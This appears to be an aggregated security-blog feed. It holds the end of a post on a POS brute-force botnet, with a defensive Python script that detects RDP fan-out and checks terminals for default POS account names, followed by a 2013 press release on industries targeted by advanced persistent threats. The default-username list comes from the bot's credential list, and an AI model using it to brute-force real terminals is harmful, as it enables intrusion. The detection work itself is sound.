USM is able to detect both the communication with the C&C server and the network activity generated when the malware performs brute-force attacks against devices on the Internet. It is worth mentioning that the C&C server IP address was already in our Open Threat Exchange database and the correlation engine used that information to generate an alarm about a system compromise.
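The network side of that detection, as an added example in Python that is not USM's correlation logic: a host on your network that starts opening RDP (3389/tcp) connections to many distinct destinations in a short window looks like this bot, whatever the C&C address is. The block runs a sliding-window fan-out check over a constructed flow-log excerpt (timestamp, source, destination, destination port; one infected host and one administrator using RDP normally) and also checks a terminal's local account names against the default usernames listed above. The log format, the threshold and the window are this example's choices; tune them to your own environment, and whitelist jump hosts that legitimately fan out over RDP.

```python
"""Spot a host fanning out RDP connection attempts, the network side of the
brute-force behaviour described above (added example; not AlienVault USM logic)."""
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Constructed flow-log excerpt (timestamp, source, destination, destination port).
# 10.0.0.5 behaves like the infected bot; 10.0.0.9 is an admin using RDP normally.
SAMPLE_LOG = """\
2014-03-10T14:02:01 10.0.0.5 198.51.100.7 3389
2014-03-10T14:02:02 10.0.0.5 198.51.100.8 3389
2014-03-10T14:02:02 10.0.0.9 10.0.0.20 3389
2014-03-10T14:02:03 10.0.0.5 198.51.100.9 3389
2014-03-10T14:02:03 10.0.0.5 203.0.113.4 3389
2014-03-10T14:02:04 10.0.0.5 203.0.113.5 3389
2014-03-10T14:02:05 10.0.0.5 203.0.113.6 443
2014-03-10T14:02:07 10.0.0.9 10.0.0.21 3389
2014-03-10T14:02:08 10.0.0.5 203.0.113.7 3389
"""

RDP_PORT = 3389

# Default POS account names quoted in the post from the bot's credential list.
DEFAULT_POS_USERS = ("pos", "pos1", "pos01", "shop", "station", "hotel",
                     "atm", "atm1", "micros", "microssvc")


def parse_flows(text):
    """Yield (timestamp, src, dst, dport) tuples; skip blank or malformed lines."""
    for line in text.splitlines():
        parts = line.split()
        if len(parts) != 4:
            continue
        ts, src, dst, dport = parts
        yield datetime.fromisoformat(ts), src, dst, int(dport)


def rdp_fanout(records, threshold=5, window=timedelta(seconds=60)):
    """Return {src: (window_start, [distinct RDP targets])} for every source that
    reached `threshold` distinct hosts on 3389/tcp inside a sliding `window`."""
    recent = defaultdict(deque)        # src -> deque of (ts, dst) still in window
    alerts = {}
    for ts, src, dst, dport in sorted(records):
        if dport != RDP_PORT:
            continue
        q = recent[src]
        q.append((ts, dst))
        while q and ts - q[0][0] > window:
            q.popleft()
        targets = {d for _, d in q}
        if len(targets) >= threshold and src not in alerts:
            alerts[src] = (q[0][0], sorted(targets))
    return alerts


def weak_pos_accounts(usernames, defaults=DEFAULT_POS_USERS):
    """Which of a terminal's local accounts match the names in the bot's list."""
    return sorted(u for u in usernames if u.lower() in defaults)


if __name__ == "__main__":
    for src, (start, targets) in rdp_fanout(parse_flows(SAMPLE_LOG)).items():
        print("%s: %d RDP targets since %s: %s" % (src, len(targets), start, ", ".join(targets)))
    print("default POS accounts present:", weak_pos_accounts(["Administrator", "POS1", "shop", "jsmith"]))
```

The check keys on distinct destinations rather than raw connection counts so that a busy but legitimate RDP session (many packets, one peer) never trips it; the infected host in the sample is flagged at its fifth distinct target, three seconds into the scan.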



If you want to try it yourself, you can download our Open Source SIEM, OSSIM, or the free 30-day trial of AlienVault Unified Security Management (USM).

We have shown how these threats can impact companies using Point of Sale terminals, especially retailers and small and medium businesses that don't have visibility into the systems on their networks that handle credit card information.

Some recommendations to protect against these kind of attacks are:

- Change default credentials of POS systems

- Configure an access control list

- Keep your software up-to-date

- Install an Antivirus solution

- Centralize and monitor the logs from your POS systems to detect potential security breaches


Posted: 11 Mar 2014 | 2:34 am

Cyber Engineering Services Announces the Cyber Red List

Cyber Engineering Services Announces the Cyber Red List, Industries That Have Been Cyber Walloped Since 2010

List Highlights Smaller Defense Supply Chain Partners, Legal Counsel and Public Relations/Advertising as Major Targets for Cyber Attacks

COLUMBIA, MD – May 7, 2013 – Based on its observation of thousands of cyber attacks over the 30 months since its founding, Cyber Engineering Services today announced the launch of the Cyber Red List. Developed using the company’s proprietary technology that enables Cyber Engineering Services to identify cyber attacks in progress, the Cyber Red List details the industries that have been hardest hit by cyber attacks since November 2010, and identifies accompanying environmental indicators that place organizations at a higher level of risk.

“Size doesn’t matter when you’re looking at cyber attack victim commonalities; the kind of data you have does,” commented Joseph Drissel, CEO of Cyber Engineering Services and former acting chief of the Department of Defense Computer Forensics Lab cyber intrusions section. “Based on what we’ve read in the news lately, it would be easy for companies with revenues of $1 billion and under to get the false impression that only the big contractors, the news organizations, and companies that are involved in Chinese diplomacy are targets. The Cyber Red List shows that what motivates the adversary is the kind of information you deal in and have access to – weapons, communications, energy, policy, and research – and often the smaller companies don’t have the resources in place to effectively seal their networks. We help them get the same level of data protection as the big guys.”

Cyber Engineering Services is an information security company with heavy experience in forensics analysis, reverse engineering and malware arenas focusing on what is known as the Advanced Persistent Threat (APT). Its proprietary technology, called Legal Non-Invasive Malware Exploitation technique (LNIME), provides the company substantial insight into the malicious activities of cyber adversaries. Cyber Engineering Services works on behalf of its clients to:
• Identify, in real time, when a cyber attack is happening,
• Stop an attack before critical data is lost,
• See live command-and-control keystrokes of the adversary, and
• Engage with the adversary to regain control of networks.
“A huge volume of our country’s intellectual property is owned by companies that supply or collaborate with large contractors or government agencies, yet what is most alarming is that many of these companies don’t have the cyber security infrastructure that their larger, better-funded counterparts do,” Drissel went on to say. “The smaller players not only have the most to lose in terms of IP and valuation, but the potential implications for national and international safety, security, health and well-being are vast. All it takes is one hole in the network to result in a massive data loss. We identify and then plug those holes to keep the bad guys out and seal data in.”
For media inquiries, contact: Media@CyberEngineeringServices.com.

The Cyber Red List

Cyber Engineering Services has observed cyber attacks in thousands of networks since the company’s inception in November 2010, many of which resulted in significant data losses for the compromised companies. The following is a snapshot of the industries that were most targeted, based on the data gathered through Cyber Engineering Services’ Legal Non-Invasive Malware Exploitation (LNIME) technique. The vast majority of compromises took place in organizations with revenues of less than $1 billion USD annually.

1. Defense, Homeland Security, International Security including unmanned aerial vehicles (UAV), satellite communications, aerospace and military communications, rocket and propulsion systems, and radar systems.

2. Critical infrastructure including energy, oil, gas, transportation, banking, and telecommunications.

3. Sensitive data exchange environments including law firms, public relations and advertising agencies whose clients do business in energy, oil, transportation, communications, and defense.

4. Long-term policy information including from lawmakers, think tanks, diplomatic and policy organizations.

5. Research and Development-focused industries including laboratories, pharmaceutical and medical facilities.

Additionally, the following environmental indicators were present in cyber attacks among the targeted industries:

1. Where data is shared electronically via email, the internet, on a smartphone or other handheld device;
2. Where the Advanced Persistent Threat or competitor could degrade or otherwise manipulate data to source, duplicate, transport, purchase, sell, manufacture or supply a product or service through alternate means;
3. Where there is a global nexus.

Due to the highly sensitive nature of the data that was breached in these attacks – inclusive of data protected under the International Traffic in Arms Regulations (ITAR) – Cyber Engineering Services does not disclose the names of the victims or the technical information that was stolen. Cyber Engineering Services has reported these incidents directly to the victims, as well as followed established protocols to report to the government agencies that oversee these functions.

Cyber Engineering Services, an information security company with heavy experience in the forensics analysis, reverse engineering and malware arenas focusing on what is known as the Advanced Persistent Threat (APT), compiled the Cyber Red List to raise awareness among victim organizations – especially smaller organizations, often with fewer cyber security resources – of the need to protect mission- and operation-critical data assets from cyber attacks. Cyber Engineering Services’ team of experts works with clients to control their networks and protect their most valued data assets using unrivaled technical skills, investigative curiosity and tenacity to prevail. For more information, contact Media@CyberEngineeringServices.com.

# # #

Posted: 6 May 2013 | 8:21 pm